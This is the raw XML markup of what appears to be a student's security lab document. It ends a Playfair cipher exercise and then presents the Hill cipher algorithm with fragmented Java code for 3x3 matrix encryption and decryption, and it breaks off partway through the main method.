AYACAAAACEA&#10;eqDYrRUCAABeBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAA&#10;ACEA719Rtt0AAAAJAQAADwAAAAAAAAAAAAAAAABvBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAE&#10;AAQA8wAAAHkFAAAAAA==&#10;" path="m,l1304417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424FB33" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="97"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C5B217" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004DD8AD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="231"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457E20CA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="242" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="4861"/>
      </w:pPr>
      <w:r>
        <w:t>Encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15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EABPUGYANSEZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Decrypted Message : SECURITYLABX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BCCB37" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FCCB912" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE4DB4E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35BE0B3D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="383"/>
      </w:pPr>
      <w:r>
        <w:t>Thus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playfair</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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decryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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and the output verified successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C1FD13" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto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169A8A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="78"/>
        <w:ind w:left="534" w:right="532"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>26c).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Hill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D339BC3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FEB7CF4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282572CF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="1080"/>
      </w:pP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Hill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB244B1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>substitution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>technique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35021DCE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D3E4A12" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="274" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ALGORITHM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AC4D09" w14:textId="77777777" w:rsidR="00A16F47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line="316" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359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Hill</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cipher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modulo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 26.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72142A75" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="7" w:line="230" w:lineRule="auto"/>
        <w:ind w:right="93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encrypt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message,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letters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multiplied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invertible </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>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x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 xml:space="preserve">matrix, again </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>modulus 26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AADC2B1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="12" w:line="232" w:lineRule="auto"/>
        <w:ind w:right="1158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decrypt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message,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multiplied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inverse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encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4712C143" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="10" w:line="232" w:lineRule="auto"/>
        <w:ind w:right="1425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matrix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encryption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cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>key,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chosen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randomly from the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>set of invertible n × n matrices (modulo 26).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358D13B0" w14:textId="77777777" w:rsidR="00A16F47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before="5" w:line="319" w:lineRule="exact"/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cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>can,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adapted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alphabet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letters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00391372" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="319" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359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modulo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letters instead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modulo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>26.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AB9AFD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="42"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A659395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05DBA1C9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240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HillCipher.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA49A6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="82"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hillCipher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24856E6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="638"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>3x3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rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3A771F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="63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int[][]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>keymat 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int[][]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 xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F89145" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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 }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>};</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>/* key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE9AF9A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="638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int[][]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>invkeymat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int[][]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 },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0 },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-2,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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63026EE0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="48"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F646F99" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="201"/>
        <w:ind w:left="638" w:right="2983"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>static String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>key =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">"ABCDEFGHIJKLMNOPQRSTUVWXYZ"; </w:t>
      </w:r>
      <w:r>
        <w:t>private static String encode(char a, char b, char c) { String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1A33D2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>ret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"";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3742E737" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="917"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>int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rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>z;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAD006D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="917" w:right="7037"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>int posa = (int) a - 65; int posb = (int) b - 65; int posc = (int) c - 65;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F6081A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44"/>
        <w:ind w:left="917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posa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keymat[0][0] +</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>posb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>* keymat[1][0]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posc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keymat[2][0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A19142" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="917"/>
      </w:pP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posa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keymat[0][1]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posb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>* keymat[1][1]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posc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keymat[2][1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514E5336" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>z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posa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keymat[0][2]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posb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keymat[1][2]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posc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2"/>
        </w:rPr>
        <w:t>keymat[2][2];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DB2E56" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>a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key.charAt(x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4"/>
        </w:rPr>
        <w:t>26);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278D77E1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="917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key.charAt(y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rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>26);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793CB605" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="917"/>
      </w:pP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key.charAt(z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12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 xml:space="preserve">26); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291FE25E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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c; return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>ret;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473BF010" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2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61756D54" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr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F00F59" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="917" w:right="4024" w:hanging="279"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>private static String decode(char a, char b, char c) { String ret = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4489AF62" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44"/>
        <w:ind w:left="917"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>int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rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>z;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711A2BB9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="917" w:right="7037"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>int posa = (int) a - 65; int posb = (int) b - 65; int posc = (int) c - 65;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140C5258" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="2222" w:firstLine="556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posa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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invkeymat[0][0]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posb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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invkeymat[1][0]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posc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>invkeymat[2][0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BFB071" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="242" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="2222" w:firstLine="556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posa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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invkeymat[0][1]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posb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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invkeymat[1][1]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posc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>invkeymat[2][1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE0BAEA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="2222" w:firstLine="556"/>
      </w:pPr>
      <w:r>
        <w:t>z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posa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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invkeymat[0][2]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posb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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invkeymat[1][2]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posc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>invkeymat[2][2];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6F7101" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917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key.charAt((x %</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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(26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 %</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>26)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2"/>
        </w:rPr>
        <w:t>26));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4F36EF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62FB6D87" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>b =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>key.charAt((y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26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(26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% 26)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>: (y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>26));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A5B3E0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:ind w:left="917"/>
      </w:pP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key.charAt((z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26 &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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? (26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26)</w:t>
      </w:r>
      <w:r>
        <w:rPr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(z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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26)); ret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 +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09F27E6E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3" w:line="273" w:lineRule="auto"/>
        <w:ind w:left="917" w:right="8583"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+ b + c; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ret;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E90493" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="244" w:lineRule="exact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2461413D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="84"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42107FBA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="638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2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>throws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>java.lang.Exception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E00CFC0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="230"/>
        <w:ind w:left="917" w:right="7554"/>
      </w:pPr>
      <w:r>
        <w:t>String msg; String enc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"";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dec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502EAFAC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="274" w:lineRule="exact"/>
